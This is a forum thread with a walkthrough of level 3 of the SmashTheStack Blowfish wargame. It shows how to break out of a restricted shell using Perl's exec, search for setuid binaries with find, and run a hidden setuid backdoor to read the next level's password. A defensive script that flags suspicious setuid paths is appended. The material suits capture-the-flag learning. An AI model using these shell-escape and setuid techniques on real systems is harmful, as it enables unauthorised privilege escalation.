[STS]Level 3 - Blowfish
  • chroniccommand
    Posts: 1,389
    Here is part 3 to my STS mission tutorials.

    Part 1
    So now you must log in to level 3 with the password acquired from the last level (Finding the backdoor). To connect to level three, use this command:
    ssh level3@blowfish.smashthestack.org -p 2222

    This will ask for the password. Just put in the password you got from the last level and you should get a connection. The login banner should look like this:

    $ssh level3@blowfish.smashthestack.org -p 2222
    password:

    1. Thou shalt NOT root or otherwise harm the box.
    2. Thou shalt NOT access any other network from this box.
    3. Thou shalt NOT use any other directory besides /tmp or /code for code.
    4. Thou shalt give the root pass to l3thal if you manage to change it.

    Passwords are in /pass.
    There is a README in each users home directory.
    /tmp && /var/tmp will be flushed daily by cron.
    Use /code plz for umm, code ;D
    IF YOU LEAVE FILES IN /levels/tmp U SUCK ..plz remove them kthnx! ;D
    The password for the last level will get you into
    Tux, the more advanced wargame. Join #blowfish on
    irc.smashthestack.org with any questions.

    Admins - l3thal && cr

    Forum: http://smashthestack.org/viewforum.php?id=10

    Last login: Fri Jan 29 14:32:54 2010 from indio.cespi.unlp.edu.ar

    You are in a restricted shell. If you can break out of it, you need to find the backdoor hidden somewhere in the system. find it and cat /pass/level4

    So as you read, it says you're in a restricted shell. You must break out of it by finding yet another backdoor.

    Part 2 - Using what's at your fingertips
    So now we need to find that backdoor and break out again, to cat /pass/level4. To do this we need to find out what's at our fingertips and what we can use in this box. Let's see what's installed and what we can use. If we play around with some stuff such as Python and Perl, you can see that Perl is installed on the box. That's great because you can issue some commands through Perl with the command line functions.
    To issue commands with Perl through the command line, you would type something like this:
    perl -e "Functions_Here"

    This will execute the code with the -e command. So now we want to test it. Try this:
    perl -e "print exec('/usr/bin/id')"

    This will execute /usr/bin/id which will print out your ID in the terminal. So now that we can execute commands through perl, we need to find that damn backdoor. Try this command:
    perl -e "print exec('/usr/bin/find / -perm -4000 -executable')"

    If you paid attention to the last tutorial, we are executing /usr/bin/find (the find command) and looking for executables with the suid flag on (4000). We issue this by using the "perl -e "print exec()"" function. Print exec() will execute what we need to do. So after executing that we should get something like this:

    /usr/bin/find: `/root': Permission denied
    /home/level3/.. /cat_lvl4
    /bin/su
    /bin/ping6
    /bin/mount
    /bin/umount
    /usr/bin/false
    /usr/bin/newgrp
    /usr/bin/chfn
    /usr/bin/gpasswd
    /usr/bin/chsh
    /usr/lib/openssh/ssh-keysign
    /usr/lib/pt_chown

    This is listing everything. Now you should see something that looks peculiar. We need to execute this with Perl. Take a look at this command:
    perl -e "print exec('/home/level3/..\ \ \ \ \ /#####')"

    NOTE: I blanked out the code to execute so you actually take your time to find it :P
    Now if we take a look at this we are executing the command that we found with the find command. We do the \ \ \ \ to escape the spaces of the directory and it will execute the backdoor we found with the "/usr/bin/find" command. This is all for this tutorial :)
    The next tutorial is your first Buffer OverFlow of the SmashTheStack missions :D how fun. Stay tuned for it.

    --Chroniccommand
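
Seen from the defender's side, the `find -perm -4000` listing in the post above can be triaged automatically. The following is an added example, not part of the original post: a POSIX shell filter that flags setuid paths outside system directories, paths containing spaces, and paths with dot-prefixed components. The trusted directory list, the function names and the sample paths are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: triage `find / -perm -4000` output for setuid files in
# places a distribution never installs them. One path per line is assumed
# (paths containing newlines are not handled).

# Directories where setuid binaries are expected (assumption: adjust per distro).
TRUSTED_DIRS='/bin/ /sbin/ /usr/bin/ /usr/sbin/ /usr/lib/ /usr/libexec/'

# Reads paths on stdin, prints "reasons<TAB>path" for every suspicious entry.
flag_suid_paths() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        reason=''
        # 1. Not under any trusted prefix.
        trusted=no
        for dir in $TRUSTED_DIRS; do
            case $path in "$dir"*) trusted=yes ;; esac
        done
        [ "$trusted" = yes ] || reason='untrusted-dir'
        # 2. A space anywhere in the path (e.g. a directory named ".. ").
        case $path in
            *' '*) reason="${reason:+$reason,}space" ;;
        esac
        # 3. A path component starting with a dot (hidden from plain `ls`).
        case $path in
            */.*) reason="${reason:+$reason,}dot-component" ;;
        esac
        [ -z "$reason" ] || printf '%s\t%s\n' "$reason" "$path"
    done
}

# Constructed sample modelled on the listing in the post; the file names
# under /home and /tmp are placeholders.
sample_listing() {
    cat <<'EOF'
/home/level3/..     /placeholder_suid
/bin/su
/bin/mount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/tmp/.cache/helper
EOF
}

sample_listing | flag_suid_paths
# On a live host: find / -xdev -type f -perm -4000 2>/dev/null | flag_suid_paths
```
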
  • Xin
    Posts: 3,251
    Great tutorial chronic! :) good job
    Xin
  • chroniccommand
    Posts: 1,389
    Xin said:
        Great tutorial chronic! :) good job

    Thanks, I worked hard on it.
  • Xin
    Posts: 3,251
    Yeah, keep these tutorials coming as I like these ones in particular xD
    Xin